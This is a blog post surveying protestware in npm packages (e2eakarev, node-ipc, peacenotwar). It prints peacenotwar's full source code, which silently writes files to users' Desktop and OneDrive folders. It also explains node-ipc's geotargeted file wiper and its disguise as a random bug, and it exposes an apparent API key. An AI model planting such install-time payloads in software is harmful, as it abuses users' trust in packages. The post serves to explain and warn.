In the ever-evolving landscape of cybersecurity threats, a disconcerting phenomenon has emerged, challenging the conventional notions of malicious software. Enter “protestware” — a term that sends shivers down the spines of cybersecurity experts and individuals alike. Unlike traditional malware, protestware isn’t designed with the sole purpose of exploiting vulnerabilities or stealing sensitive information. Instead, it leverages its malicious intent to advance a particular ideological or political agenda, leaving victims caught in the crossfire of virtual activism.
Protestware Example
One of the last and most exiting protestware sample comes from npm ( HERE ), the notorious javasripts repository manager. In particular the package named: e2eakarev implements a simple but significative stereotype of this emerging type of Malicious Unwanted Software. Once the “victim” install the package.json through npm install, it drives the installation process in the following way:
The file index.js is run in post-installation process. The index.js is implemented by the following code
Basically it queries ipgeolocation.io (though the apikey: fa845b4108e34abe981624d400f18a5d ) to check if the packet is installed in Israel. If the IP source address match the Israel IP-code base then it prints directly to the console “PROTEST_MESSAGE”. The printed message follows in the code (which is available here) if you want to read it.
Not all the Protestware are the same
While e2eakarev was a not destructive piece of Malware, many other protestware still behave like wipers (take a look to this github repo) . For example node-ipc implements a nice piece of protestware which wipes out victims files. Indeed if any victims are using IP in Russia or Belarus, all their files will be wiped entirely with a heart emoji. Manually set a 25% probability at the beginning of the timeout, so that this thing looks more like a floating bug than something intentional. This affects the package node-ipc from 10.1.1 and before 10.1.3. From versions 11.0.0 onwards, instead of having malicious code directly in the source of this package.
However many of them like peacenotwar (here) really impress for their messages and for the ability to propagate them in external drives or even on network drive like OneDrive.
import fs from 'fs';
import find from './service/findFiles.js';
import read from './service/readFile.js';
import { homedir } from 'os';
var Desktops = `${homedir}/Desktop/`;
var OneDrive = `${homedir}/OneDrive/`;
var OneDriveDesktops = `${homedir}/OneDrive/Desktop/`;
var DesktopFileExists=find(Desktops,'WITH-LOVE-FROM-AMERICA.txt');
var OneDriveDesktopFileExists=find(OneDriveDesktops,'WITH-LOVE-FROM-AMERICA.txt');
var OneDriveFileExists=find(OneDrive,'WITH-LOVE-FROM-AMERICA.txt');
function deliverAPeacefulMessage(path,message){
try{
fs.writeFile(
path,
message,
function(err){
//its all good
}
);
}catch(err){
//thats ok
}
}
//let's be polite and only do this once.
//hopefully once is all it takes.
if(!DesktopFileExists?.length&&!OneDriveFileExists?.length&&!OneDriveDesktopFileExists?.length){
var thinkaboutit='WITH-LOVE-FROM-AMERICA.txt';
var WITH_LOVE_FROM_AMERICA=read(`./${thinkaboutit}`);
deliverAPeacefulMessage(`${Desktops}${thinkaboutit}`,WITH_LOVE_FROM_AMERICA);
deliverAPeacefulMessage(`${OneDriveDesktops}${thinkaboutit}`,WITH_LOVE_FROM_AMERICA);
deliverAPeacefulMessage(`${OneDrive}${thinkaboutit}`,WITH_LOVE_FROM_AMERICA);
}
var whatWeWant='♥';
export {
whatWeWant as default,
whatWeWant
}This module will add a message of peace on your users’ desktops, and it will only do it if it does not already exist just to be polite. Affected versions of this package are vulnerable to Undesired Behavior. It creates files on users’ desktops and OneDrive.
Conclusions
As we conclude our exploration into the realm of protestware in 2023, it’s evident that the landscape of cyber threats is becoming increasingly complex and nuanced. The rise of this unique form of malicious software underscores the dynamic nature of cybersecurity challenges, transcending traditional motives of financial gain or data theft.
The symbiotic relationship between technology and activism has birthed a new frontier where virtual protests manifest in the form of code, infiltrating systems with the intent to disrupt and spread discord. While the motivations behind protestware may be rooted in ideological or political convictions, its consequences are felt far beyond the digital realm.
As individuals and organizations grapple with the evolving threat landscape, it’s crucial to adapt strategies and fortify defenses against this emerging menace. Cybersecurity measures must evolve to encompass not only the traditional concerns of data privacy and system integrity but also the socio-political dimensions that protestware introduces.
In the ongoing battle against protestware, knowledge remains our most potent weapon. By staying informed and proactive, we can collectively build a resilient defense against this distinctive breed of cyber threat, ensuring a safer and more secure digital future for all.
DISCLAIMER: I employed artificial intelligence to accurately revise and rephrase sections of this blog post.
About Author
